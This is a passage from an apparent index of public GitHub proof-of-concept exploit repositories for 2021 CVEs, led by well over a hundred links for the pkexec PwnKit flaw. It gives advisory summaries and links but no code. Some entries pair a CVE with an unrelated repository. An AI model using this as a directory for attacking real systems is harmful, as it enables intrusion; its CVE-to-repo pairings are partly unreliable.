[rami08448/CVE-2021-3656-Demo](https://github.com/rami08448/CVE-2021-3656-Demo) + +### CVE-2021-3679 (2021-08-05) + +A lack of CPU resource in the Linux kernel tracing module functionality in versions prior to 5.14-rc3 was found in the way user uses trace ring buffer in a specific way. Only privileged local users (with CAP_SYS_ADMIN capability) could use this flaw to starve the resources causing denial of service. + + +- [aegistudio/RingBufferDetonator](https://github.com/aegistudio/RingBufferDetonator) + +### CVE-2021-3707 (2021-08-16) + +D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3708, to execute any OS commands on the vulnerable device. + + +- [HadiMed/DSL-2750U-Full-chain](https://github.com/HadiMed/DSL-2750U-Full-chain) + +### CVE-2021-3749 (2021-08-31) + +axios is vulnerable to Inefficient Regular Expression Complexity + + +- [T-Guerrero/axios-redos](https://github.com/T-Guerrero/axios-redos) + +### CVE-2021-3754 (2022-08-26) + +A flaw was found in keycloak where an attacker is able to register himself with the username same as the email ID of any existing user. This may cause trouble in getting password recovery email in case the user forgets the password. + + +- [7Ragnarok7/CVE-2021-3754](https://github.com/7Ragnarok7/CVE-2021-3754) + +### CVE-2021-3773 (2022-02-16) + +A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks. + + +- [d0rb/CVE-2021-3773](https://github.com/d0rb/CVE-2021-3773) + +### CVE-2021-3831 (2021-12-14) + +gnuboard5 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') + + +- [aratane/CVE-2021-3831](https://github.com/aratane/CVE-2021-3831) + +### CVE-2021-3864 (2022-08-26) + +A flaw was found in the way the dumpable flag setting was handled when certain SUID binaries executed its descendants. The prerequisite is a SUID binary that sets real UID equal to effective UID, and real GID equal to effective GID. The descendant will then have a dumpable value set to 1. As a result, if the descendant process crashes and core_pattern is set to a relative value, its core dump is stored in the current directory with uid:gid permissions. An unprivileged local user with eligible root SUID binary could use this flaw to place core dumps into root-owned directories, potentially resulting in escalation of privileges. + + +- [walac/cve-2021-3864](https://github.com/walac/cve-2021-3864) + +### CVE-2021-3899 (2024-06-03) + +There is a race condition in the 'replaced executable' detection that, with the correct local configuration, allow an attacker to execute arbitrary code as root. + + +- [liumuqing/CVE-2021-3899_PoC](https://github.com/liumuqing/CVE-2021-3899_PoC) + +### CVE-2021-3929 (2022-08-25) + +A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host. + + +- [QiuhaoLi/CVE-2021-3929-3947](https://github.com/QiuhaoLi/CVE-2021-3929-3947) + +### CVE-2021-3972 (2022-04-22) + +A potential vulnerability by a driver used during manufacturing process on some consumer Lenovo Notebook devices' BIOS that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable. + + +- [killvxk/CVE-2021-3972](https://github.com/killvxk/CVE-2021-3972) + +### CVE-2021-4034 (2022-01-28) + +A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine. + + +- [ryaagard/CVE-2021-4034](https://github.com/ryaagard/CVE-2021-4034) +- [berdav/CVE-2021-4034](https://github.com/berdav/CVE-2021-4034) +- [clubby789/CVE-2021-4034](https://github.com/clubby789/CVE-2021-4034) +- [gbrsh/CVE-2021-4034](https://github.com/gbrsh/CVE-2021-4034) +- [arthepsy/CVE-2021-4034](https://github.com/arthepsy/CVE-2021-4034) +- [JohnHammond/CVE-2021-4034](https://github.com/JohnHammond/CVE-2021-4034) +- [Audiobahn/CVE-2021-4034](https://github.com/Audiobahn/CVE-2021-4034) +- [dzonerzy/poc-cve-2021-4034](https://github.com/dzonerzy/poc-cve-2021-4034) +- [nikaiw/CVE-2021-4034](https://github.com/nikaiw/CVE-2021-4034) +- [mebeim/CVE-2021-4034](https://github.com/mebeim/CVE-2021-4034) +- [Ayrx/CVE-2021-4034](https://github.com/Ayrx/CVE-2021-4034) +- [Y3A/CVE-2021-4034](https://github.com/Y3A/CVE-2021-4034) +- [An00bRektn/CVE-2021-4034](https://github.com/An00bRektn/CVE-2021-4034) +- [ayypril/CVE-2021-4034](https://github.com/ayypril/CVE-2021-4034) +- [wongwaituck/CVE-2021-4034](https://github.com/wongwaituck/CVE-2021-4034) +- [0x05a/my-cve-2021-4034-poc](https://github.com/0x05a/my-cve-2021-4034-poc) +- [silocityit/cve-2021-4034-playground](https://github.com/silocityit/cve-2021-4034-playground) +- [zhzyker/CVE-2021-4034](https://github.com/zhzyker/CVE-2021-4034) +- [J0hnbX/CVE-2021-4034-new](https://github.com/J0hnbX/CVE-2021-4034-new) +- [Immersive-Labs-Sec/CVE-2021-4034](https://github.com/Immersive-Labs-Sec/CVE-2021-4034) +- [kimusan/pkwner](https://github.com/kimusan/pkwner) +- [N1et/CVE-2021-4034](https://github.com/N1et/CVE-2021-4034) +- [Nero22k/CVE-2021-4034](https://github.com/Nero22k/CVE-2021-4034) +- [LukeGix/CVE-2021-4034](https://github.com/LukeGix/CVE-2021-4034) +- [aus-mate/CVE-2021-4034-POC](https://github.com/aus-mate/CVE-2021-4034-POC) +- [chenaotian/CVE-2021-4034](https://github.com/chenaotian/CVE-2021-4034) +- [moldabekov/CVE-2021-4034](https://github.com/moldabekov/CVE-2021-4034) +- [jostmart/-CVE-2021-4034](https://github.com/jostmart/-CVE-2021-4034) +- [c3l3si4n/pwnkit](https://github.com/c3l3si4n/pwnkit) +- [n3rdh4x0r/CVE-2021-4034](https://github.com/n3rdh4x0r/CVE-2021-4034) +- [ly4k/PwnKit](https://github.com/ly4k/PwnKit) +- [san3ncrypt3d/CVE-2021-4034-POC](https://github.com/san3ncrypt3d/CVE-2021-4034-POC) +- [fdellwing/CVE-2021-4034](https://github.com/fdellwing/CVE-2021-4034) +- [xcanwin/CVE-2021-4034-UniontechOS](https://github.com/xcanwin/CVE-2021-4034-UniontechOS) +- [azminawwar/CVE-2021-4034](https://github.com/azminawwar/CVE-2021-4034) +- [PeterGottesman/pwnkit-exploit](https://github.com/PeterGottesman/pwnkit-exploit) +- [sunny0day/CVE-2021-4034](https://github.com/sunny0day/CVE-2021-4034) +- [artemis-mike/cve-2021-4034](https://github.com/artemis-mike/cve-2021-4034) +- [whokilleddb/CVE-2021-4034](https://github.com/whokilleddb/CVE-2021-4034) +- [dadvlingd/CVE-2021-4034](https://github.com/dadvlingd/CVE-2021-4034) +- [zcrosman/cve-2021-4034](https://github.com/zcrosman/cve-2021-4034) +- [robemmerson/CVE-2021-4034](https://github.com/robemmerson/CVE-2021-4034) +- [joeammond/CVE-2021-4034](https://github.com/joeammond/CVE-2021-4034) +- [luijait/PwnKit-Exploit](https://github.com/luijait/PwnKit-Exploit) +- [Anonymous-Family/CVE-2021-4034](https://github.com/Anonymous-Family/CVE-2021-4034) +- [phvilasboas/CVE-2021-4034](https://github.com/phvilasboas/CVE-2021-4034) +- [hackingyseguridad/CVE-2021-4034](https://github.com/hackingyseguridad/CVE-2021-4034) +- [vilasboasph/CVE-2021-4034](https://github.com/vilasboasph/CVE-2021-4034) +- [nobelh/CVE-2021-4034](https://github.com/nobelh/CVE-2021-4034) +- [callrbx/pkexec-lpe-poc](https://github.com/callrbx/pkexec-lpe-poc) +- [cd80-ctf/CVE-2021-4034](https://github.com/cd80-ctf/CVE-2021-4034) +- [Al1ex/CVE-2021-4034](https://github.com/Al1ex/CVE-2021-4034) +- [ashutoshrohilla/CVE-2021-4034](https://github.com/ashutoshrohilla/CVE-2021-4034) +- [nikip72/CVE-2021-4034](https://github.com/nikip72/CVE-2021-4034) +- [NiS3x/CVE-2021-4034](https://github.com/NiS3x/CVE-2021-4034) +- [thatstraw/CVE-2021-4034](https://github.com/thatstraw/CVE-2021-4034) +- [luckythandel/CVE-2021-4034](https://github.com/luckythandel/CVE-2021-4034) +- [Plethore/CVE-2021-4034](https://github.com/Plethore/CVE-2021-4034) +- [evdenis/lsm_bpf_check_argc0](https://github.com/evdenis/lsm_bpf_check_argc0) +- [tahaafarooq/poppy](https://github.com/tahaafarooq/poppy) +- [DosAmp/pkwned](https://github.com/DosAmp/pkwned) +- [PwnFunction/CVE-2021-4034](https://github.com/PwnFunction/CVE-2021-4034) +- [NULL0B/CVE-2021-4034](https://github.com/NULL0B/CVE-2021-4034) +- [locksec/CVE-2021-4034](https://github.com/locksec/CVE-2021-4034) +- [deoxykev/CVE-2021-4034-Rust](https://github.com/deoxykev/CVE-2021-4034-Rust) +- [c3c/CVE-2021-4034](https://github.com/c3c/CVE-2021-4034) +- [Fato07/Pwnkit-exploit](https://github.com/Fato07/Pwnkit-exploit) +- [EstamelGG/CVE-2021-4034-NoGCC](https://github.com/EstamelGG/CVE-2021-4034-NoGCC) +- [pengalaman-1t/CVE-2021-4034](https://github.com/pengalaman-1t/CVE-2021-4034) +- [NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit](https://github.com/NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit) +- [jpmcb/pwnkit-go](https://github.com/jpmcb/pwnkit-go) +- [JoyGhoshs/CVE-2021-4034](https://github.com/JoyGhoshs/CVE-2021-4034) +- [galoget/PwnKit-CVE-2021-4034](https://github.com/galoget/PwnKit-CVE-2021-4034) +- [Yakumwamba/POC-CVE-2021-4034](https://github.com/Yakumwamba/POC-CVE-2021-4034) +- [ayoub-elbouzi/CVE-2021-4034-Pwnkit](https://github.com/ayoub-elbouzi/CVE-2021-4034-Pwnkit) +- [Sakura-nee/CVE-2021-4034](https://github.com/Sakura-nee/CVE-2021-4034) +- [oreosec/pwnkit](https://github.com/oreosec/pwnkit) +- [CYB3RK1D/CVE-2021-4034-POC](https://github.com/CYB3RK1D/CVE-2021-4034-POC) +- [Rvn0xsy/CVE-2021-4034](https://github.com/Rvn0xsy/CVE-2021-4034) +- [Kirill89/CVE-2021-4034](https://github.com/Kirill89/CVE-2021-4034) +- [qq224015/CVE-2021-4034](https://github.com/qq224015/CVE-2021-4034) +- [NeonWhiteRabbit/CVE-2021-4034](https://github.com/NeonWhiteRabbit/CVE-2021-4034) +- [glowbase/PwnKit-CVE-2021-4034](https://github.com/glowbase/PwnKit-CVE-2021-4034) +- [sofire/polkit-0.96-CVE-2021-4034](https://github.com/sofire/polkit-0.96-CVE-2021-4034) +- [codiobert/pwnkit-scanner](https://github.com/codiobert/pwnkit-scanner) +- [v-rzh/CVE-2021-4034](https://github.com/v-rzh/CVE-2021-4034) +- [TW-D/PwnKit-Vulnerability_CVE-2021-4034](https://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034) +- [OXDBXKXO/ez-pwnkit](https://github.com/OXDBXKXO/ez-pwnkit) +- [milot/dissecting-pkexec-cve-2021-4034](https://github.com/milot/dissecting-pkexec-cve-2021-4034) +- [0x01-sec/CVE-2021-4034-](https://github.com/0x01-sec/CVE-2021-4034-) +- [navisec/CVE-2021-4034-PwnKit](https://github.com/navisec/CVE-2021-4034-PwnKit) +- [Almorabea/pkexec-exploit](https://github.com/Almorabea/pkexec-exploit) +- [teelrabbit/Polkit-pkexec-exploit-for-Linux](https://github.com/teelrabbit/Polkit-pkexec-exploit-for-Linux) +- [scent2d/PoC-CVE-2021-4034](https://github.com/scent2d/PoC-CVE-2021-4034) +- [HrishitJoshi/CVE-2021-4034](https://github.com/HrishitJoshi/CVE-2021-4034) +- [Ankit-Ojha16/CVE-2021-4034](https://github.com/Ankit-Ojha16/CVE-2021-4034) +- [G01d3nW01f/CVE-2021-4034](https://github.com/G01d3nW01f/CVE-2021-4034) +- [drapl0n/pwnKit](https://github.com/drapl0n/pwnKit) +- [rvizx/CVE-2021-4034](https://github.com/rvizx/CVE-2021-4034) +- [Joffr3y/Polkit-CVE-2021-4034-HLP](https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP) +- [ziadsaleemi/polkit_CVE-2021-4034](https://github.com/ziadsaleemi/polkit_CVE-2021-4034) +- [FDlucifer/Pwnkit-go](https://github.com/FDlucifer/Pwnkit-go) +- [cspshivam/cve-2021-4034](https://github.com/cspshivam/cve-2021-4034) +- [an0n7os/CVE-2021-4034](https://github.com/an0n7os/CVE-2021-4034) +- [DanaEpp/pwncat_pwnkit](https://github.com/DanaEpp/pwncat_pwnkit) +- [x04000/CVE-2021-4034](https://github.com/x04000/CVE-2021-4034) +- [x04000/AutoPwnkit](https://github.com/x04000/AutoPwnkit) +- [hohn/codeql-sample-polkit](https://github.com/hohn/codeql-sample-polkit) +- [ck00004/CVE-2021-4034](https://github.com/ck00004/CVE-2021-4034) +- [LJP-TW/CVE-2021-4034](https://github.com/LJP-TW/CVE-2021-4034) +- [fnknda/CVE-2021-4034_POC](https://github.com/fnknda/CVE-2021-4034_POC) +- [Tanmay-N/CVE-2021-4034](https://github.com/Tanmay-N/CVE-2021-4034) +- [hahaleyile/CVE-2021-4034](https://github.com/hahaleyile/CVE-2021-4034) +- [movvamrocks/PwnKit-CVE-2021-4034](https://github.com/movvamrocks/PwnKit-CVE-2021-4034) +- [Squirre17/CVE-2021-4034](https://github.com/Squirre17/CVE-2021-4034) +- [Jesrat/make_me_root](https://github.com/Jesrat/make_me_root) +- [defhacks/cve-2021-4034](https://github.com/defhacks/cve-2021-4034) +- [ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034](https://github.com/ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034) +- [edsonjt81/CVE-2021-4034-Linux](https://github.com/edsonjt81/CVE-2021-4034-Linux) +- [nel0x/pwnkit-vulnerability](https://github.com/nel0x/pwnkit-vulnerability) +- [TomSgn/CVE-2021-4034](https://github.com/TomSgn/CVE-2021-4034) +- [battleoverflow/CVE-2021-4034](https://github.com/battleoverflow/CVE-2021-4034) +- [TheJoyOfHacking/berdav-CVE-2021-4034](https://github.com/TheJoyOfHacking/berdav-CVE-2021-4034) +- [tzwlhack/CVE-2021-4034](https://github.com/tzwlhack/CVE-2021-4034) +- [jcatala/f_poc_cve-2021-4034](https://github.com/jcatala/f_poc_cve-2021-4034) +- [Nosferatuvjr/PwnKit](https://github.com/Nosferatuvjr/PwnKit) +- [TotallyNotAHaxxer/CVE-2021-4034](https://github.com/TotallyNotAHaxxer/CVE-2021-4034) +- [rhin0cer0s/CVE-2021-4034](https://github.com/rhin0cer0s/CVE-2021-4034) +- [0x4ndy/CVE-2021-4034-PoC](https://github.com/0x4ndy/CVE-2021-4034-PoC) +- [antoinenguyen-09/CVE-2021-4034](https://github.com/antoinenguyen-09/CVE-2021-4034) +- [wudicainiao/cve-2021-4034](https://github.com/wudicainiao/cve-2021-4034) +- [TanmoyG1800/CVE-2021-4034](https://github.com/TanmoyG1800/CVE-2021-4034) +- [CronoX1/CVE-2021-4034](https://github.com/CronoX1/CVE-2021-4034) +- [supportingmx/cve-2021-4034](https://github.com/supportingmx/cve-2021-4034) +- [A1vinSmith/CVE-2021-4034](https://github.com/A1vinSmith/CVE-2021-4034) +- [HellGateCorp/pwnkit](https://github.com/HellGateCorp/pwnkit) +- [Silencecyber/cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034) +- [Geni0r/cve-2021-4034-poc](https://github.com/Geni0r/cve-2021-4034-poc) +- [zxc2007/CVE-2021-4034](https://github.com/zxc2007/CVE-2021-4034) +- [Pixailz/CVE-2021-4034](https://github.com/Pixailz/CVE-2021-4034) +- [toecesws/CVE-2021-4034](https://github.com/toecesws/CVE-2021-4034) +- [jehovah2002/CVE-2021-4034-pwnkit](https://github.com/jehovah2002/CVE-2021-4034-pwnkit) +- [fei9747/CVE-2021-4034](https://github.com/fei9747/CVE-2021-4034) +- [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit) +- [mutur4/CVE-2021-4034](https://github.com/mutur4/CVE-2021-4034) +- [n3rdh4x0r/CVE-2021-4034_Python3](https://github.com/n3rdh4x0r/CVE-2021-4034_Python3) +- [TheSermux/CVE-2021-4034](https://github.com/TheSermux/CVE-2021-4034) +- [ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection](https://github.com/ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection) +- [asepsaepdin/CVE-2021-4034](https://github.com/asepsaepdin/CVE-2021-4034) +- [JohnGilbert57/CVE-2021-4034-Capture-the-flag](https://github.com/JohnGilbert57/CVE-2021-4034-Capture-the-flag) +- [Part01-Pai/Polkit-Permission-promotion-compiled](https://github.com/Part01-Pai/Polkit-Permission-promotion-compiled) +- [cdxiaodong/CVE-2021-4034-touch](https://github.com/cdxiaodong/CVE-2021-4034-touch) +- [LucasPDiniz/CVE-2021-4034](https://github.com/LucasPDiniz/CVE-2021-4034) +- [Pol-Ruiz/CVE-2021-4034](https://github.com/Pol-Ruiz/CVE-2021-4034) +- [cerodah/CVE-2021-4034](https://github.com/cerodah/CVE-2021-4034) +- [FancySauce/PwnKit-CVE-2021-4034](https://github.com/FancySauce/PwnKit-CVE-2021-4034) +- [wechicken456/CVE-2021-4034-CTF-writeup](https://github.com/wechicken456/CVE-2021-4034-CTF-writeup) +- [ASG-CASTLE/CVE-2021-4034](https://github.com/ASG-CASTLE/CVE-2021-4034) +- [X-Projetion/Exploiting-PwnKit-CVE-2021-4034-](https://github.com/X-Projetion/Exploiting-PwnKit-CVE-2021-4034-) +- [evkl1d/CVE-2021-4034](https://github.com/evkl1d/CVE-2021-4034) +- [Typical0day/CVE-2021-4034](https://github.com/Typical0day/CVE-2021-4034) +- [lsclsclsc/CVE-2021-4034](https://github.com/lsclsclsc/CVE-2021-4034) +- [EuJin03/CVE-2021-4034-PoC](https://github.com/EuJin03/CVE-2021-4034-PoC) + +### CVE-2021-4043 (2022-02-04) + +NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0. + + +- [cyberark/PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter) + +### CVE-2021-4044 (2021-12-14) + +Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return value is mishandled by OpenSSL and will cause an IO function (such as SSL_connect() or SSL_do_handshake()) to not indicate success and a subsequent call to SSL_get_error() to return the value SSL_ERROR_WANT_RETRY_VERIFY. This return value is only supposed to be returned by OpenSSL if the application has previously called SSL_CTX_set_cert_verify_callback(). Since most applications do not do this the SSL_ERROR_WANT_RETRY_VERIFY return value from SSL_get_error() will be totally unexpected and applications may not behave correctly as a result. The exact behaviour will depend on the application but it could result in crashes, infinite loops or other similar incorrect responses. This issue is made more serious in combination with a separate bug in OpenSSL 3.0 that will cause X509_verify_cert() to indicate an internal error when processing a certificate chain. This will occur where a certificate does not include the Subject Alternative Name extension but where a Certificate Authority has enforced name constraints. This issue can occur even with valid chains. By combining the two issues an attacker could induce incorrect, application dependent behaviour. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). + + +- [phirojshah/CVE-2021-4044](https://github.com/phirojshah/CVE-2021-4044) + +### CVE-2021-4045 (2022-03-07) + +TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera. + + +- [hacefresko/CVE-2021-4045](https://github.com/hacefresko/CVE-2021-4045) +- [jeffbezosispogg/CVE-2021-4045](https://github.com/jeffbezosispogg/CVE-2021-4045) +- [pl4int3xt/CVE-2021-4045](https://github.com/pl4int3xt/CVE-2021-4045) + +### CVE-2021-4104 (2021-12-14) + +JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. + + +- [cckuailong/log4shell_1.x](https://github.com/cckuailong/log4shell_1.x) +- [open-AIMS/log4j](https://github.com/open-AIMS/log4j) + +### CVE-2021-4154 (2022-02-04) + +A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system. + + +- [Markakd/CVE-2021-4154](https://github.com/Markakd/CVE-2021-4154) +- [veritas501/CVE-2021-4154](https://github.com/veritas501/CVE-2021-4154) + +### CVE-2021-4191 (2022-03-28) + +An issue has been discovered in GitLab CE/EE affecting versions 13.0 to 14.6.5, 14.7 to 14.7.4, and 14.8 to 14.8.2. Private GitLab instances with restricted sign-ups may be vulnerable to user enumeration to unauthenticated users through the GraphQL API. + + +- [Adelittle/CVE-2021-4191_Exploits](https://github.com/Adelittle/CVE-2021-4191_Exploits) +- [K3ysTr0K3R/CVE-2021-4191-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-4191-EXPLOIT) + +### CVE-2021-4204 (2022-08-24) + +An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information. + + +- [tr3ee/CVE-2021-4204](https://github.com/tr3ee/CVE-2021-4204) + +### CVE-2021-4428 (2023-07-18) + +In what3words Autosuggest Plugin bis 4.0.0 für WordPress wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Betroffen ist die Funktion enqueue_scripts der Datei w3w-autosuggest/public/class-w3w-autosuggest-public.php der Komponente Setting Handler. Mit der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Ein Aktualisieren auf die Version 4.0.1 vermag dieses Problem zu lösen. Der Patch wird als dd59cbac5f86057d6a73b87007c08b8bfa0c32ac bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [CERT-hr/Log4Shell](https://github.com/CERT-hr/Log4Shell) + +### CVE-2021-6857 +- [zi0n8/CVE-2021-6857](https://github.com/zi0n8/CVE-2021-6857) + +### CVE-2021-6901 +- [mooneee/cve-2021-6901](https://github.com/mooneee/cve-2021-6901) + +### CVE-2021-10086 +- [AK-blank/CVE-2021-10086](https://github.com/AK-blank/CVE-2021-10086) + +### CVE-2021-20021 (2021-04-09) + +A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host. + + +- [SUPRAAA-1337/CVE-2021-20021](https://github.com/SUPRAAA-1337/CVE-2021-20021) + +### CVE-2021-20038 (2021-12-08) + +A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + + +- [vesperp/CVE-2021-20038-SonicWall-RCE](https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE) + +### CVE-2021-20138 (2021-12-09) + +An unauthenticated command injection vulnerability exists in multiple parameters in the Gryphon Tower router’s web interface at /cgi-bin/luci/rc. An unauthenticated remote attacker on the same network can execute commands as root on the device by sending a specially crafted malicious packet to the web interface. + + +- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138) + +### CVE-2021-20233 (2021-03-03) + +A flaw was found in grub2 in versions prior to 2.06. Setparam_prefix() in the menu rendering code performs a length calculation on the assumption that expressing a quoted single quote will require 3 characters, while it actually requires 4 characters which allows an attacker to corrupt memory by one byte for each quote in the input. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix) + +### CVE-2021-20253 (2021-03-09) + +A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [mbadanoiu/CVE-2021-20253](https://github.com/mbadanoiu/CVE-2021-20253) + +### CVE-2021-20294 (2021-04-29) + +A flaw was found in binutils readelf 2.35 program. An attacker who is able to convince a victim using readelf to read a crafted file could trigger a stack buffer overflow, out-of-bounds write of arbitrary data supplied by the attacker. The highest impact of this flaw is to confidentiality, integrity, and availability. + + +- [tin-z/CVE-2021-20294-POC](https://github.com/tin-z/CVE-2021-20294-POC) + +### CVE-2021-20323 (2022-03-25) + +A POST based reflected Cross Site Scripting vulnerability on has been identified in Keycloak. + + +- [ndmalc/CVE-2021-20323](https://github.com/ndmalc/CVE-2021-20323) +- [Cappricio-Securities/CVE-2021-20323](https://github.com/Cappricio-Securities/CVE-2021-20323) +- [cscpwn0sec/CVE-2021-20323](https://github.com/cscpwn0sec/CVE-2021-20323) + +### CVE-2021-20717 (2021-05-10) + +Cross-site scripting vulnerability in EC-CUBE 4.0.0 to 4.0.5 allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser. + + +- [s-index/CVE-2021-20717](https://github.com/s-index/CVE-2021-20717) + +### CVE-2021-20837 (2021-10-26) + +Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. + + +- [ghost-nemesis/cve-2021-20837-poc](https://github.com/ghost-nemesis/cve-2021-20837-poc) +- [orangmuda/CVE-2021-20837](https://github.com/orangmuda/CVE-2021-20837) +- [Cosemz/CVE-2021-20837](https://github.com/Cosemz/CVE-2021-20837) +- [bb33bb/CVE-2021-20837](https://github.com/bb33bb/CVE-2021-20837) +- [lamcodeofpwnosec/CVE-2021-20837](https://github.com/lamcodeofpwnosec/CVE-2021-20837) + +### CVE-2021-21014 (2021-02-11) + +Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker. Access to the admin console is required for successful exploitation. + + +- [HoangKien1020/CVE-2021-21014](https://github.com/HoangKien1020/CVE-2021-21014) + +### CVE-2021-21017 (2021-02-11) + +Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [ZeusBox/CVE-2021-21017](https://github.com/ZeusBox/CVE-2021-21017) +- [tzwlhack/CVE-2021-21017](https://github.com/tzwlhack/CVE-2021-21017) + +### CVE-2021-21042 (2021-02-11) + +Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Read vulnerability that could lead to arbitrary disclosure of information in the memory stack. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [NattiSamson/CVE-2021-21042](https://github.com/NattiSamson/CVE-2021-21042) +- [r1l4-i3pur1l4/CVE-2021-21042](https://github.com/r1l4-i3pur1l4/CVE-2021-21042) + +### CVE-2021-21086 (2021-09-02) + +Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [infobyte/Exploit-CVE-2021-21086](https://github.com/infobyte/Exploit-CVE-2021-21086) + +### CVE-2021-21110 (2021-01-08) + +Use after free in safe browsing in Google Chrome prior to 87.0.4280.141 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. + + +- [Gh0st0ne/CVE-2021-21110](https://github.com/Gh0st0ne/CVE-2021-21110) + +### CVE-2021-21123 (2021-02-09) + +Insufficient data validation in File System API in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. + + +- [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://github.com/Puliczek/CVE-2021-21123-PoC-Google-Chrome) + +### CVE-2021-21148 (2021-02-09) + +Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [Grayhaxor/CVE-2021-21148](https://github.com/Grayhaxor/CVE-2021-21148) + +### CVE-2021-21193 (2021-03-16) + +Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [mehrzad1994/CVE-2021-21193](https://github.com/mehrzad1994/CVE-2021-21193) + +### 